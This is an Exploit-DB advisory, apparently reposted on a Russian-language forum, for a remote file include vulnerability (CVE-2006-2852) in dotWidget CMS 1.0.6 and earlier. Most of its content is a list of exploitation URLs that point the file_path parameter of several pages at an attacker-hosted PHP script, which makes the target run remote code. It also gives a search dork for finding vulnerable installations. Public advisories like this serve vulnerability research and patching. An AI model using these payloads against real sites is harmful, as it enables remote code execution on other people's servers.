- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1879
- Проверка EDB
-
- Пройдено
- Автор
- AESTHETICO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-2852
- Дата публикации
- 2006-06-05
Код:
Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------
Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------
Exploitation:
/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?
EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.
/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?
# milw0rm.com [2006-06-05]- Источник
- www.exploit-db.com
